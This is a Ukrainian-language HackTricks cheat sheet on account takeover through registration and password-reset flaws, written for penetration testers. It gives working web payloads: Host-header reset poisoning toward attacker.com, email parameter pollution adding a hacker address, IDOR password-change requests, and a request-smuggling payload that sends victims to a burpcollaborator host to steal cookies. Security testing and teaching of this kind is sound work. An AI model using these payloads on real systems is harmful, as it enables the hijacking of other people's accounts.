# Вразливості реєстрації та захоплення

{{#include ../banners/hacktricks-training.md}}

## Захоплення реєстрації

### Дублювання реєстрації

- Спробуйте згенерувати, використовуючи існуюче ім'я користувача
- Перевірте, варіюючи електронну пошту:
- великі літери
- \+1@
- додайте крапку в електронній пошті
- спеціальні символи в імені електронної пошти (%00, %09, %20)
- Додайте чорні символи після електронної пошти: `test@test.com a`
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com

### Перерахування імен користувачів

Перевірте, чи можете ви з'ясувати, коли ім'я користувача вже було зареєстровано в додатку.

### Політика паролів

Створюючи користувача, перевірте політику паролів (перевірте, чи можете ви використовувати слабкі паролі).\
У цьому випадку ви можете спробувати брутфорсити облікові дані.

### SQL-ін'єкція

[**Перевірте цю сторінку** ](sql-injection/index.html#insert-statement), щоб дізнатися, як спробувати захоплення облікових записів або витягти інформацію через **SQL-ін'єкції** у формах реєстрації.

### Захоплення Oauth

{{#ref}}
oauth-to-account-takeover.md
{{#endref}}

### Вразливості SAML

{{#ref}}
saml-attacks/
{{#endref}}

### Зміна електронної пошти

Після реєстрації спробуйте змінити електронну пошту та перевірте, чи ця зміна правильно перевіряється або чи можна змінити її на довільні електронні адреси.

### Більше перевірок

- Перевірте, чи можете ви використовувати **одноразові електронні адреси**
- **Довгий** **пароль** (>200) призводить до **DoS**
- **Перевірте обмеження швидкості на створення облікових записів**
- Використовуйте username@**burp_collab**.net і аналізуйте **callback**

## **Захоплення скидання пароля**

### Витік токена скидання пароля через реферер <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Запросіть скидання пароля на вашу електронну адресу
2. Натисніть на посилання для скидання пароля
3. Не змінюйте пароль
4. Перейдіть на будь-які сторонні вебсайти (наприклад: Facebook, Twitter)
5. Перехопіть запит у проксі Burp Suite
6. Перевірте, чи заголовок referer витікає токен скидання пароля.

### Отруєння скидання пароля <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Перехопіть запит на скидання пароля в Burp Suite
2. Додайте або відредагуйте наступні заголовки в Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Перешліть запит з модифікованим заголовком\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Шукайте URL скидання пароля на основі _заголовка host_, наприклад: `https://attacker.com/reset-password.php?token=TOKEN`

### Скидання пароля через параметр електронної пошти <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR на API Параметрах <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Атакуючий повинен увійти в свій обліковий запис і перейти до функції **Змінити пароль**.
2. Запустіть Burp Suite і перехопіть запит.
3. Відправте його на вкладку повторювача та відредагуйте параметри: User ID/email\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`

### Слабкий Токен Скидання Пароля <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Токен скидання пароля повинен генеруватися випадковим чином і бути унікальним щоразу.\
Спробуйте визначити, чи токен має термін дії або завжди однаковий, в деяких випадках алгоритм генерації є слабким і може бути вгаданий. Наступні змінні можуть використовуватися алгоритмом.

- Timestamp
- UserID
- Email користувача
- Ім'я та прізвище
- Дата народження
- Криптографія
- Тільки числа
- Невелика послідовність токенів (символи між \[A-Z,a-z,0-9])
- Повторне використання токена
- Дата закінчення терміну дії токена

### Витік Токена Скидання Пароля <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Викличте запит на скидання пароля, використовуючи API/UI для конкретної електронної пошти, наприклад: test@mail.com
2. Перевірте відповідь сервера та перевірте наявність `resetToken`
3. Потім використайте токен в URL, наприклад `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`

### Скидання Пароля Через Колізію Імені Користувача <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Зареєструйтеся в системі з іменем користувача, ідентичним імені користувача жертви, але з пробілами перед і/або після імені користувача. наприклад: `"admin "`
2. Запросіть скидання пароля з вашим зловмисним іменем користувача.
3. Використайте токен, надісланий на вашу електронну пошту, і скиньте пароль жертви.
4. Увійдіть до облікового запису жертви з новим паролем.

Платформа CTFd була вразливою до цієї атаки.\
Дивіться: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### Захоплення Облікового Запису Через Міжсайтовий Скриптинг <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Знайдіть XSS всередині програми або піддомену, якщо куки обмежені до батьківського домену: `*.domain.com`
2. Витягніть поточний **cookie сесії**
3. Аутентифікуйтеся як користувач, використовуючи cookie

### Захоплення Облікового Запису Через HTTP Запит Смуглінг <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. Використовуйте **smuggler** для виявлення типу HTTP Запит Смуглінг (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Сформуйте запит, який перезапише `POST / HTTP/1.1` з наступними даними:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` з метою перенаправлення жертв на burpcollab і викрадення їхніх куків\
3\. Остаточний запит може виглядати наступним чином
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
Hackerone звіти про експлуатацію цього багу\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

### Захоплення облікового запису через CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. Створіть payload для CSRF, наприклад: “HTML форма з автоматичною відправкою для зміни пароля”
2. Відправте payload

### Захоплення облікового запису через JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

JSON Web Token може використовуватися для аутентифікації користувача.

- Змініть JWT на інший User ID / Email
- Перевірте на слабкий підпис JWT

{{#ref}}
hacking-jwt-json-web-tokens.md
{{#endref}}

## Посилання

- [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover)

{{#include ../banners/hacktricks-training.md}}